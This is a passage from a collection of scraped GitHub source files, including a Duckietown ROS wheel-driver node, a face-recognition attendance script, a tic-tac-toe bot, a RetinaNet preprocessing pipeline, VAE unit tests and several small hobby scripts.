the execution of the commands\n to `~wheels_cmd_executed`.\n\n The emergency flag is `False` by default.\n\n Subscribers:\n ~wheels_cmd (:obj:`WheelsCmdStamped`): The requested wheel command\n ~emergency_stop (:obj:`BoolStamped`): Emergency stop. Can stop the actual execution of\n the wheel commands by the motors if set to `True`. Set to `False` for nominal\n operations.\n Publishers:\n ~wheels_cmd_executed (:obj:`WheelsCmdStamped`): Publishes the actual commands executed,\n i.e. when the emergency flag is `False` it publishes the requested command, and\n when it is `True`: zero values for both motors.\n\n \"\"\"\n\n def __init__(self, node_name):\n # Initialize the DTROS parent class\n super(WheelsDriverNode, self).__init__(node_name=node_name, node_type=NodeType.DRIVER)\n\n self.estop = False\n\n # Setup the driver\n self.driver = DaguWheelsDriver()\n\n # Initialize the executed commands message\n self.msg_wheels_cmd = WheelsCmdStamped()\n\n # Publisher for wheels command wih execution time\n self.pub_wheels_cmd = rospy.Publisher(\n \"~wheels_cmd_executed\", WheelsCmdStamped, queue_size=1, dt_topic_type=TopicType.DRIVER\n )\n\n # Subscribers\n self.sub_topic = rospy.Subscriber(\"~wheels_cmd\", WheelsCmdStamped, self.wheels_cmd_cb, queue_size=1)\n self.sub_e_stop = rospy.Subscriber(\"~emergency_stop\", BoolStamped, self.estop_cb, queue_size=1)\n\n # # user hardware tests\n self._hardware_test_left = HardwareTestMotor(HardwareTestMotorSide.LEFT, self.driver)\n self._hardware_test_right = HardwareTestMotor(HardwareTestMotorSide.RIGHT, self.driver)\n\n self.log(\"Initialized.\")\n\n def wheels_cmd_cb(self, msg):\n \"\"\"\n Callback that sets wheels' speeds.\n\n Creates the wheels' speed message and publishes it. If the\n emergency stop flag is activated, publishes zero command.\n\n Args:\n msg (WheelsCmdStamped): velocity command\n \"\"\"\n if self.estop:\n vel_left = 0.0\n vel_right = 0.0\n else:\n vel_left = msg.vel_left\n vel_right = msg.vel_right\n\n self.driver.set_wheels_speed(left=vel_left, right=vel_right)\n # Put the wheel commands in a message and publish\n self.msg_wheels_cmd.header = msg.header\n # Record the time the command was given to the wheels_driver\n self.msg_wheels_cmd.header.stamp = rospy.get_rostime()\n self.msg_wheels_cmd.vel_left = vel_left\n self.msg_wheels_cmd.vel_right = vel_right\n self.pub_wheels_cmd.publish(self.msg_wheels_cmd)\n\n def estop_cb(self, msg):\n \"\"\"\n Callback that enables/disables emergency stop\n\n Args:\n msg (BoolStamped): emergency_stop flag\n \"\"\"\n\n self.estop = msg.data\n if self.estop:\n self.log(\"Emergency Stop Activated\")\n else:\n self.log(\"Emergency Stop Released\")\n\n def on_shutdown(self):\n \"\"\"\n Shutdown procedure.\n\n Publishes a zero velocity command at shutdown.\n \"\"\"\n self.driver.set_wheels_speed(left=0.0, right=0.0)\n\n\nif __name__ == \"__main__\":\n # Initialize the node with rospy\n node = WheelsDriverNode(node_name=\"wheels_driver_node\")\n # Keep it spinning to keep the node alive\n rospy.spin()\n","repo_name":"duckietown/dt-duckiebot-interface","sub_path":"packages/wheels_driver/src/wheels_driver_node.py","file_name":"wheels_driver_node.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"9670321963","text":"print('=====Menghitung rata rata=====')\nprint()\n\nx = int(input('Masukkan jumlah data input: '))\ndata = []\ni = 1\nwhile i <= x:\n score = float(input(\"Masukkan nilai : \"))\n data.append(score)\n i += 1\n\nrata2 = sum(data)/x\nprint()\nprint(\"Nilai rata rata dari data yang telah di input adalah : \")","repo_name":"issacianmutiara/Issacian-Mutiara-Paska_I0320053_Tiffany-Bella_Tugas6","sub_path":"I0320053_Soal 2.py","file_name":"I0320053_Soal 2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3845828971","text":"import os\nfrom playsound import playsound\nfrom PIL import Image\nimport time, msvcrt\n\nclass gatx:\n def __init__(self,name,sex,type,personality):\n print (f'Generando un gatx llamadx {name}, {sex}, de tipo {type}, y con una personalidad {personality}')\n ##atributos de instancia\n self.name = name\n self.sex = sex\n self.type = type\n self.personality = personality\n \n \n def maulla(self,maullidos):\n \n sum = 0\n i= 1\n #maullidos = int(maullidos)\n while i <= maullidos:\n sum = sum + 1\n i = i + 1 \n if self.personality == \"amigable\": \n print (f\"Miaw {sum}\")\n playsound ('recursos/sonidos/amigable.mp3')\n elif self.personality == \"verguerx\":\n print (f\"Iggggg {sum}\") \n playsound ('recursos/sonidos/verguera.mp3')\n elif self.personality == \"solitarix\":\n print (f\"Meaw {sum}\") \n playsound ('recursos\\sonidos\\solitario.mp3')\n elif self.personality == \"jugueton(a)\":\n print (f\"M i a u {sum}\") \n playsound ('recursos\\sonidos\\jugueton.mp3')\n elif self.personality == \"mamon(a)\":\n print (f\"Miau con desprecio {sum}\") \n playsound ('recursos\\sonidos\\mamon.mp3')\n\n def camina(self, pasos):\n if self.sex == \"macho\": \n print(f\"Caminando {pasos} pasos\") \n m = Image.open(\"recursos\\imagenes\\macho.jpg\")\n m.show()\n elif self.sex == \"hembra\":\n print(f\"Caminando {pasos} pasos\") \n h = Image.open(\"recursos\\imagenes\\hembra.jpg\")\n h.show()\n elif self.sex == \"te vale\":\n print(f\"Caminando {pasos} pasos\") \n alv = Image.open(\"recursos/imagenes/alv.jpg\")\n alv = alv.convert('L')\n alv.show()\n \n \n def ronronea(self,ronroneo):\n sum = 0\n i= 1 \n while i <= ronroneo:\n sum = sum + 1\n i = i + 1\n print (f\"Prrr {sum}\") \n playsound ('recursos\\sonidos\\gato_ronroneo.mp3')\n\n def dormir(self):\n t0 = time.time()\n t0 = int(t0)\n print(\"DURMIENDO...\")\n msvcrt.getch()\n t1 = time.time()\n t1 = int(t1)\n print(f\"Dormiste por {t1-t0} segundos\")","repo_name":"MCrux25/no-xavier-named","sub_path":"Personal/programa_gatx/recursos/gato.py","file_name":"gato.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43940561502","text":"# importing libraries\nimport cv2\nimport os\nimport pickle\nimport numpy as np\nimport cvzone\nimport face_recognition\nimport datetime\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom firebase_admin import storage\n\n# firebase creds\ncred = credentials.Certificate(\"key.json\")\nfirebase_admin.initialize_app(cred,{\n \"databaseURL\":'https://classcapture-1362b-default-rtdb.firebaseio.com/',\n \"storageBucket\":'classcapture-1362b.appspot.com'\n})\n\nbucket = storage.bucket()\n\n# webcam settings\ncapture = cv2.VideoCapture(1)\ncapture.set(3, 640)\ncapture.set(4, 480)\n\n# background image\nbgImg = cv2.imread('Resources/background.png')\n\n# creating modes list to switch between different modes\nmodesFolderPath = 'Resources/Modes'\nmodesPathList = os.listdir(modesFolderPath)\nmodesList = []\nfor path in modesPathList:\n modesList.append(cv2.imread(os.path.join(modesFolderPath,path)))\n\n# --- load the encoding file --- #\nprint(\"loading the encode file...\")\nfile = open('encodeFile.p','rb')\nencodingsWithIDs = pickle.load(file)\nfile.close()\nencodings,studentIDs = encodingsWithIDs\n# print(studentIDs) to test if IDs are fetched\nprint(\"encode file loaded\")\n\n# variables\nmodeType = 0\nframeCounter = 0\nimgStudent =[]\n# process\nwhile True:\n success, img = capture.read()\n\n # --- scaling down the image to reduce the computation power required --- #\n imgSmall = cv2.resize(img,(0,0),None,0.25,0.25)\n imgSmall = cv2.cvtColor(imgSmall, cv2.cv2.COLOR_BGR2RGB)\n\n # finding out encodings in current frame\n faceCurrFrame = face_recognition.face_locations(imgSmall)\n encodeCurrFrame = face_recognition.face_encodings(imgSmall,faceCurrFrame)\n\n # UI layout\n bgImg[162:162+480,55:55+640] = img\n bgImg[44:44+633,808:808+414] = modesList[modeType]\n\n # if face in frame\n if faceCurrFrame:\n # matching the face with the encodings\n for encodeFace,faceLocation in zip(encodeCurrFrame,faceCurrFrame):\n matches = face_recognition.compare_faces(encodings,encodeFace)\n faceDistance = face_recognition.face_distance(encodings,encodeFace)\n # print('matches: ',matches)\n # print('face Distance: ',faceDistance)\n\n matchIndex = np.argmin(faceDistance)\n\n if matches[matchIndex]:\n # print(\"known face detected\")\n # print(\"Id: \",studentIDs[matchIndex])\n # --- boundry box info --- #\n y1,x2,y2,x1 = faceLocation\n y1,x2,y2,x1= y1 * 4, x2 * 4, y2 * 4, x1 * 4\n bbox = 55+x1,162+y1,x2-x1,y2-y1\n bgImg = cvzone.cornerRect(bgImg,bbox,rt=0)\n # get id\n id = studentIDs[matchIndex]\n if frameCounter == 0:\n frameCounter = 1\n modeType=1\n \n if frameCounter!=0:\n if frameCounter==1:\n # get students data\n studentInfo = db.reference(f'Students/{id}').get()\n print(studentInfo)\n \n # get image from storage\n blob = bucket.get_blob(f'Images/{id}.png')\n array = np.frombuffer(blob.download_as_string(),np.uint8)\n imgStudent = cv2.imdecode(array,cv2.COLOR_BGRA2BGR)\n \n # update student attendance\n dateTimeObj = datetime.strptime(studentInfo['last_attendance_time'],\"%Y-%m-%d %H:%M:%S\")\n secondsElapsed = (datetime.now() - dateTimeObj).total_seconds()\n print(secondsElapsed)\n \n if secondsElapsed>30: # change 30 secs to whichever hours you want the student attendance to update\n ref =db.reference(f'Students/{id}')\n studentInfo['total_attendance']+=1\n ref.child('total_attendance').set(studentInfo['total_attendance'])\n ref.child('last_attendance_time').set(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n else:\n modeType=3\n counter =0\n bgImg[44:44+633,808:808+414] = modesList[modeType]\n\n \n \n # only do when mode type != 3\n if modeType!=3:\n # marked frame image\n if 10=20:\n frameCounter=0\n modeType=0\n studentInfo=[]\n imgStudent =[]\n bgImg[44:44+633,808:808+414] = modesList[modeType]\n \n else:\n modeType=0\n counter =0\n \n \n # webcam layout\n # cv2.imshow(\"Webcam\", img)\n\n # background layout\n cv2.imshow(\"Backgroung image\", bgImg)\n cv2.waitKey(1)\n","repo_name":"yaksh1/Ai-Attendance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17623971399","text":"import random\nimport copy\n\nclass TicTacToe3X3GamePlay:\n\n def __init__(self):\n\n # current state stores how 'X's and 'O's are placed on the board\n self.currentState = [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0]\n\n # 3 in a row, 3 in a column, 2 diagonals\n self.winningCombintation = [(0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6)]\n\n # some positions for rule-based bot to move on\n self.cornerPosition = [0, 2, 6, 8]\n self.middlePosition = 4\n self.allPosition = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n\n # number to identity player X (DQN) and player O (rule-based)\n self.playerXMark = 1.0\n self.playerOMark = 0.0\n\n # new game by reset the board\n def ResetGame (self):\n self.currentState = [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0]\n return self.currentState\n\n # Player X proceed one step, then Player O\n def ProceedGameGivenAction(self, playerXAction):\n\n gameFinish = False\n result = \"No Result\"\n\n # if Player X make an invalid move with the given action\n if not self.IsBoardFreeOfSpaceGivenAction(self.currentState, playerXAction):\n return None, \"Invalid Move\", True\n\n # Player X proceeds with the action\n self.ApplyActionToBoard (self.currentState, playerXAction, self.playerXMark)\n\n # if player X wins\n if(self.IsWinnerGivenPlayer(self.currentState, self.playerXMark)):\n result = \"Win\"\n gameFinish = True\n\n # if a draw game\n elif self.IsFullGame():\n result = \"Draw\"\n gameFinish = True\n\n # if the game is not finished yet\n else:\n # player O proceeds\n playerOAction = self.PlayerOProccedOneStep()\n\n # Player O proceeds with the action\n self.ApplyActionToBoard (self.currentState, playerOAction, self.playerOMark)\n\n # if player O wins\n if (self.IsWinnerGivenPlayer(self.currentState, self.playerOMark)):\n result = \"Lose\"\n gameFinish = True\n\n # if a draw game\n elif self.IsFullGame():\n result = \"Draw\"\n gameFinish = True\n\n return self.currentState, result, gameFinish\n\n # find out if player X/O is winner\n def IsWinnerGivenPlayer(self, currentState, playerMark):\n # check all winning combinations\n for combination in self.winningCombintation:\n if (currentState[combination[0]] == currentState[combination[1]] == currentState[combination[2]] == playerMark):\n return True\n return False\n\n # rule-based Player O strategy\n def PlayerOProccedOneStep (self):\n # check if Player O can win in the next move\n for i in range(0,len(self.currentState)):\n currentStateCopy = copy.deepcopy(self.currentState)\n if self.IsBoardFreeOfSpaceGivenAction(currentStateCopy, i):\n self.ApplyActionToBoard (currentStateCopy, i, self.playerOMark)\n if self.IsWinnerGivenPlayer(currentStateCopy, self.playerOMark):\n return i\n # check if Player X can win in the next move\n for i in range(0,len(self.currentState)):\n currentStateCopy = copy.deepcopy(self.currentState)\n if self.IsBoardFreeOfSpaceGivenAction(currentStateCopy, i):\n self.ApplyActionToBoard (currentStateCopy, i, self.playerXMark)\n if self.IsWinnerGivenPlayer(currentStateCopy, self.playerXMark):\n return i\n\n # rule priority (1) take the corner (2) take the middle (3) take the rest randomly\n # (1) take the corner\n action = self.RandomNextAction(self.cornerPosition)\n if action != None:\n return action\n # (2) take the middle\n if self.IsBoardFreeOfSpaceGivenAction(self.currentState, self.middlePosition):\n return self.middlePosition\n # (3) take the rest randomly\n return self.RandomNextAction(self.allPosition)\n\n # check the board is free of space for the action\n def IsBoardFreeOfSpaceGivenAction (self, currentState, action):\n return currentState[action] == -1.0\n\n # check if the board is full\n def IsFullGame(self):\n\n for i in range(1,9):\n if self.IsBoardFreeOfSpaceGivenAction(self.currentState, i):\n return False\n return True\n\n def ApplyActionToBoard (self, currentState, index, move):\n currentState[index] = move\n\n # random pick the next action given positions\n def RandomNextAction (self, positionList):\n possibleActions = []\n # find all possible action\n for index in positionList:\n if self.IsBoardFreeOfSpaceGivenAction(self.currentState, index):\n possibleActions.append(index)\n # randomly choose one action from possibleActions\n if len(possibleActions) != 0:\n return random.choice(possibleActions)\n else:\n return None","repo_name":"abken601/Tic-Tac-Toe-Deep-Reinforcement-Learning","sub_path":"gameplay.py","file_name":"gameplay.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28652357991","text":"import json\n\nimport tkinter as tk\nfrom tkinter import filedialog, simpledialog\nimport pygame\n\nfrom client.resources.ResourcesManager import ResourcesManager\nfrom editor.Structures import Object, Button, ToolIcon, MapTile\n\n\ndef export(map):\n root = tk.Tk()\n root.withdraw()\n\n map_id = simpledialog.askinteger(title=\"Map ID\",\n prompt=\"Enter the map ID:\")\n\n file_path = filedialog.asksaveasfilename(defaultextension='.json')\n\n if len(file_path) == 0 or file_path == \"()\":\n return\n\n data = {\n \"id\": map_id,\n \"obstacles\": [],\n \"surfaces\": [],\n \"cup\": {},\n \"ball\": {}\n }\n\n for tile in map:\n if tile.has_object():\n for obj in tile.objects:\n if obj.type == 'cup':\n pos = (tile.rect[0] + obj.image.get_width() // 2,\n tile.rect[1] + obj.image.get_height() // 2)\n dim = obj.image.get_size()\n\n data['cup']['name'] = obj.name\n data['cup']['pos'] = pos\n data['cup']['dim'] = dim\n data['cup']['rotation'] = obj.rotation\n\n elif obj.type == 'ball':\n pos = (tile.rect[0] + obj.image.get_width() // 2,\n tile.rect[1] + obj.image.get_height() // 2)\n dim = (obj.image.get_width() // 2, obj.image.get_height() // 2)\n\n data['ball']['name'] = obj.name\n data['ball']['pos'] = pos\n data['ball']['dim'] = dim\n data['ball']['rotation'] = obj.rotation\n else:\n pos = (tile.rect[0], tile.rect[1])\n dim = (obj.image.get_width(), obj.image.get_height())\n\n data[obj.type].append({\n 'name': obj.name,\n 'pos': pos,\n 'dim': dim,\n 'rotation': obj.rotation,\n 'vertical': obj.vertical,\n 'horizontal': obj.horizontal\n })\n\n with open(file_path, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef save(map):\n root = tk.Tk()\n root.withdraw()\n\n file_path = filedialog.asksaveasfilename(defaultextension='.json')\n\n if len(file_path) == 0 or file_path == \"()\":\n return\n\n data = {\n 'map': []\n }\n\n for tile in map:\n obj_list = []\n\n for obj in tile.objects:\n obj_list.append({\n 'name': obj.name,\n 'rect': (tile.rect[0], tile.rect[1], tile.rect[2], tile.rect[3]),\n 'dim': obj.image.get_size(),\n 'vertical': obj.vertical,\n 'horizontal': obj.horizontal,\n 'rotation': obj.rotation,\n 'type': obj.type\n })\n\n data['map'].append(obj_list)\n\n with open(file_path, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef load(map):\n root = tk.Tk()\n root.withdraw()\n\n file_path = filedialog.askopenfilename()\n\n if len(file_path) == 0 or file_path == \"()\":\n return\n\n with open(file_path) as file:\n data = json.load(file)\n\n map_data = data['map']\n\n for i in range(len(map)):\n obj_list = map_data[i]\n\n if len(obj_list) > 0:\n tile = MapTile(map[i].rect, None)\n\n for obj in obj_list:\n tile.add_object(Object(pygame.transform.scale(ResourcesManager.get_image(obj['name']),\n obj['dim']), obj['name'], obj['rotation'], obj['type'],\n horiz=obj['horizontal'], vert=obj['vertical']))\n\n map[i] = tile\n","repo_name":"krzysztofMlczk/MiniGolf-python-","sub_path":"editor/FileUtils.py","file_name":"FileUtils.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2736023826","text":"#\n# The purpose of this program is to preprocess data we receive from the DataInterconnect\n# to a format more usable by the datascience models we're constructing.\n#\nimport csv\n\nparsed = csv.reader(open('../rawdata.csv'))\n\nwriter = csv.writer(open('../datasets/Augmented.csv', 'w', newline=''))\n\n\n#new format\n# \"timestamp\",\"open\",\"high\",\"low\",\"Close\",\"volume\",\n# 1612588920000,38984.04,38984.05,38966.36,38972.2,2.4257,\n\npreviousTimestamp = 0\nprevRow = []\nfor row in parsed:\n print(row)\n if(row[0]==\"timestamp\"):\n newRow = [\"Timestamp\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume_(BTC)\",\"Volume_(Currency)\",\"Weighted_Price\"]\n writer.writerow(newRow)\n if(row[0]!=\"timestamp\"):\n newRow = [row[0],row[1],row[2],row[3],row[4],\"0.9\",str(float(row[4])*0.9),row[4]]\n writer.writerow(newRow)\n","repo_name":"AustinHoover/crypto","sub_path":"analysis/preprocessing/newdata.py","file_name":"newdata.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5020543988","text":"import tensorflow as tf\n\nfrom retinanet.dataloader.utils import (convert_to_xywh, normalize_image,\n random_flip_horizontal)\n\n\nclass PreprocessingPipelineV2:\n def __init__(self, input_shape, params):\n\n if not input_shape[0] == input_shape[1]:\n raise AssertionError('Non square inputs are not supported, got {}'\n .format(input_shape))\n\n self.target_size = input_shape[0]\n self.preprocessing_params = params.preprocessing\n self.augmentation_params = params.augmentations\n\n def _resize_with_pad(self, image):\n target_size = self.target_size\n image_size = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n scale = tf.reduce_min(target_size / image_size)\n\n scaled_shape = tf.round(scale * image_size)\n resize_scale = scaled_shape / image_size\n scaled_shape = tf.cast(scaled_shape, dtype=tf.int32)\n image = tf.image.resize(image, size=scaled_shape)\n image = tf.image.pad_to_bounding_box(image, 0, 0, target_size,\n target_size)\n return image, image_size, resize_scale\n\n def _rescale_labels(self,\n boxes,\n class_ids,\n image_size,\n resize_scale,\n offset,\n target_size):\n boxes = tf.stack(\n [\n boxes[:, 0] * image_size[1] * resize_scale[1] - offset[1],\n boxes[:, 1] * image_size[0] * resize_scale[0] - offset[0],\n boxes[:, 2] * image_size[1] * resize_scale[1] - offset[1],\n boxes[:, 3] * image_size[0] * resize_scale[0] - offset[0],\n ],\n axis=-1,\n )\n boxes = tf.clip_by_value(\n boxes, 0.0,\n [target_size[1], target_size[0], target_size[1], target_size[0]])\n\n boxes = convert_to_xywh(boxes)\n idx = tf.where(\n tf.logical_and(tf.greater(boxes[:, 2], 0.), tf.greater(boxes[:, 3],\n 0.)))[:, 0]\n boxes = tf.gather(boxes, idx)\n class_ids = tf.gather(class_ids, idx)\n return boxes, class_ids\n\n def _random_rescale_image(self, image):\n target_size = tf.cast(self.target_size, dtype=tf.float32)\n scale = tf.random.uniform([],\n self.augmentation_params.scale_jitter.min_scale,\n self.augmentation_params.scale_jitter.max_scale)\n\n scaled_shape = tf.cast(tf.round(scale * target_size), dtype=tf.int32)\n image = tf.image.resize(image, size=[scaled_shape, scaled_shape])\n return image\n\n def _random_crop_image_and_labels(self, image, boxes, class_ids):\n image_size = tf.shape(image)\n min_object_covered = tf.random.uniform((), minval=0.1, maxval=0.9)\n boxes_transposed = tf.stack(\n [boxes[:, 1], boxes[:, 0], boxes[:, 3], boxes[:, 2]], axis=-1)\n\n offset, size, _ = tf.image.sample_distorted_bounding_box(\n image_size=image_size,\n bounding_boxes=tf.expand_dims(boxes_transposed, axis=0),\n min_object_covered=min_object_covered,\n aspect_ratio_range=[0.8, 1.25],\n area_range=[0.1, 1.0],\n max_attempts=100,\n name='random_crop_image_and_labels')\n\n image = tf.slice(image, offset, size)\n image, _, resize_scale = self._resize_with_pad(image)\n\n offset = tf.cast(offset, dtype=tf.float32)\n size = tf.cast(size, dtype=tf.float32)\n image_size = tf.cast(image_size, dtype=tf.float32)\n\n boxes, class_ids = self._rescale_labels(\n boxes=boxes,\n class_ids=class_ids,\n image_size=image_size[:2],\n resize_scale=[1.0, 1.0],\n offset=offset[:2],\n target_size=size[:2] - 1.0)\n\n boxes = boxes * tf.stack([resize_scale[1], resize_scale[0],\n resize_scale[1], resize_scale[0]], axis=-1)\n return image, boxes, class_ids\n\n def __call__(self, sample):\n image = normalize_image(\n sample[\"image\"],\n offset=self.preprocessing_params.offset,\n scale=self.preprocessing_params.scale)\n\n boxes = sample[\"objects\"][\"bbox\"]\n class_ids = tf.cast(sample[\"objects\"][\"label\"], dtype=tf.int32)\n\n if self.augmentation_params.use_augmentation \\\n and self.augmentation_params.horizontal_flip:\n image, boxes = random_flip_horizontal(image, boxes)\n\n if tf.random.uniform([]) < 0.5 or \\\n not self.augmentation_params.use_augmentation:\n image, image_shape, resize_scale = self._resize_with_pad(image)\n boxes, class_ids = self._rescale_labels(\n boxes=boxes,\n class_ids=class_ids,\n image_size=image_shape,\n resize_scale=resize_scale,\n offset=[0.0, 0.0],\n target_size=[self.target_size, self.target_size])\n else:\n if tf.random.uniform([]) < 0.5 \\\n and self.augmentation_params.use_augmentation:\n image = self._random_rescale_image(image)\n\n image, boxes, class_ids = self._random_crop_image_and_labels(\n image,\n boxes,\n class_ids)\n\n image.set_shape([self.target_size, self.target_size, 3])\n return image, boxes, class_ids\n\n def preprocess_val_sample(self, sample):\n image = normalize_image(\n sample[\"image\"],\n offset=self.preprocessing_params.offset,\n scale=self.preprocessing_params.scale)\n\n image, _, resize_scale = self._resize_with_pad(image)\n return {\n 'image': image,\n 'image_id': sample['image_id'],\n 'resize_scale': resize_scale\n }\n","repo_name":"srihari-humbarwadi/retinanet-tensorflow2.x","sub_path":"retinanet/dataloader/preprocessing_pipeline_v2.py","file_name":"preprocessing_pipeline_v2.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"27"} +{"seq_id":"22525449906","text":"import unittest\nimport os\nimport shutil\nimport torch\nfrom catvae.trainer import MultVAE, MultBatchVAE, BiomDataModule\nfrom catvae.sim import multinomial_bioms, multinomial_batch_bioms\nfrom biom import Table\nfrom biom.util import biom_open\nimport numpy as np\nfrom pytorch_lightning import Trainer\nimport pandas as pd\n\nfrom scipy.stats import pearsonr\nfrom scipy.spatial.distance import pdist\n\n\nclass TestVAEModel(unittest.TestCase):\n\n def setUp(self):\n np.random.seed(1)\n torch.manual_seed(1)\n self.k, self.D, self.N, self.M = 10, 50, 500, 100000\n self.sims = multinomial_bioms(k=self.k, D=self.D,\n N=self.N, M=self.M)\n Y = self.sims['Y']\n parts = Y.shape[0] // 10\n samp_ids = list(map(str, range(Y.shape[0])))\n obs_ids = list(map(str, range(Y.shape[1])))\n train = Table(Y[:parts * 8].T, obs_ids, samp_ids[:parts * 8])\n test = Table(Y[parts * 8: parts * 9].T,\n obs_ids, samp_ids[parts * 8: parts * 9])\n valid = Table(Y[parts * 9:].T, obs_ids, samp_ids[parts * 9:])\n with biom_open('train.biom', 'w') as f:\n train.to_hdf5(f, 'train')\n with biom_open('test.biom', 'w') as f:\n test.to_hdf5(f, 'test')\n with biom_open('valid.biom', 'w') as f:\n valid.to_hdf5(f, 'valid')\n self.sims['tree'].write('basis.nwk')\n\n def tearDown(self):\n if os.path.exists('lightning_logs'):\n shutil.rmtree('lightning_logs')\n if os.path.exists('summary'):\n shutil.rmtree('summary')\n os.remove('basis.nwk')\n os.remove('train.biom')\n os.remove('test.biom')\n os.remove('valid.biom')\n\n @unittest.skip('See the ipynb for a working example.')\n def test_run(self):\n model = MultVAE(n_input=self.D, n_latent=self.k,\n n_hidden=16, basis='basis.nwk',\n dropout=0, bias=True, batch_norm=False,\n encoder_depth=1, learning_rate=0.1,\n overdispersion=False,\n scheduler='cosine_warm', transform='pseudocount')\n model.set_eigs(self.sims['eigvectors'], self.sims['eigs'])\n dm = BiomDataModule('train.biom', 'test.biom', 'valid.biom',\n batch_size=50)\n trainer = Trainer(\n max_epochs=50,\n gpus=0,\n check_val_every_n_epoch=10,\n fast_dev_run=False,\n )\n trainer.fit(model, dm)\n\n # Make sure that the estimates are darn close\n W = model.vae.decoder.weight.detach().cpu().numpy()\n d_estW = pdist(W)\n simW = self.sims['W'] / np.sqrt(self.sims['eigs'])\n dW = pdist(simW)\n r, p = pearsonr(dW, d_estW)\n self.assertGreater(r, 0.9)\n self.assertLess(p, 1e-8)\n\n\nclass TestBatchVAEModel(unittest.TestCase):\n def setUp(self):\n np.random.seed(0)\n torch.manual_seed(0)\n self.k, self.D, self.N, self.M, self.C = 10, 50, 500, 100000, 3\n self.sims = multinomial_batch_bioms(k=self.k, D=self.D,\n N=self.N, M=self.M, C=self.C)\n Y = self.sims['Y']\n parts = Y.shape[0] // 10\n samp_ids = list(map(str, range(Y.shape[0])))\n obs_ids = list(map(str, range(Y.shape[1])))\n train = Table(Y[:parts * 8].T, obs_ids, samp_ids[:parts * 8])\n test = Table(Y[parts * 8: parts * 9].T,\n obs_ids, samp_ids[parts * 8: parts * 9])\n valid = Table(Y[parts * 9:].T, obs_ids, samp_ids[parts * 9:])\n with biom_open('train.biom', 'w') as f:\n train.to_hdf5(f, 'train')\n with biom_open('test.biom', 'w') as f:\n test.to_hdf5(f, 'test')\n with biom_open('valid.biom', 'w') as f:\n valid.to_hdf5(f, 'valid')\n\n md = pd.DataFrame({'batch_category': self.sims['batch_idx']},\n index=samp_ids)\n md.index.name = 'sampleid'\n md.to_csv('metadata.txt', sep='\\t')\n batch_priors = pd.Series(self.sims['alphaILR'])\n batch_priors.to_csv('batch_priors.txt', sep='\\t')\n self.sims['tree'].write('basis.nwk')\n\n def tearDown(self):\n os.remove('basis.nwk')\n os.remove('batch_priors.txt')\n os.remove('metadata.txt')\n os.remove('train.biom')\n os.remove('test.biom')\n os.remove('valid.biom')\n if os.path.exists('lightning_logs'):\n shutil.rmtree('lightning_logs')\n\n @unittest.skip('See the ipynb for a working example.')\n def test_fit(self):\n model = MultBatchVAE(n_input=self.D, n_latent=self.k,\n n_hidden=16, n_batches=self.C,\n basis='basis.nwk', batch_prior='batch_priors.txt',\n dropout=0, bias=True, batch_norm=False,\n encoder_depth=1, learning_rate=0.1,\n scheduler='cosine_warm',\n transform='pseudocount')\n\n model.set_eigs(self.sims['eigvectors'], self.sims['eigs'])\n print(model)\n dm = BiomDataModule('train.biom', 'test.biom', 'valid.biom',\n metadata='metadata.txt',\n batch_category='batch_category',\n batch_size=50)\n\n trainer = Trainer(\n max_epochs=50,\n gpus=0,\n check_val_every_n_epoch=1,\n fast_dev_run=False,\n )\n trainer.fit(model, dm)\n\n # See if the model can approximately recover W\n W = model.vae.decoder.weight.detach().cpu().numpy()\n d_estW = pdist(W)\n simW = self.sims['W'] / np.sqrt(self.sims['eigs'])\n dW = pdist(simW)\n r, p = pearsonr(dW, d_estW)\n self.assertGreater(r, 0.15)\n self.assertLess(p, 0.001)\n # See if the model can approximately remove beta\n B = model.vae.beta.weight.detach().cpu().numpy().T\n d_estB = pdist(B)\n simB = self.sims['B'].T\n dB = pdist(simB)\n r, p = pearsonr(dB, d_estB)\n self.assertGreater(r, 0.3)\n self.assertLess(p, 1e-8)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"flatironinstitute/catvae","sub_path":"catvae/tests/test_trainer.py","file_name":"test_trainer.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"27"} +{"seq_id":"34591157254","text":"import os\nimport csv\n\nfrom data_types import Purchase\n\n\ndef main():\n print_header()\n filename = get_data_file()\n data = load_file(filename)\n query_data(data)\n\n\ndef print_header():\n print('REAL ESTATE APP')\n print('===============')\n\n\ndef get_data_file():\n base_folder = os.path.dirname(__file__)\n return os.path.join(base_folder, 'data', 'realestate.csv')\n\n\ndef load_file(filename):\n with open(filename, 'r', encoding='utf-8') as fin:\n reader = csv.DictReader(fin)\n purchases = []\n\n for row in reader:\n p = Purchase.create_from_dict(row)\n purchases.append(row)\n\n return purchases\n\ndef get_price(p):\n return p['price']\n\ndef query_data(data):\n 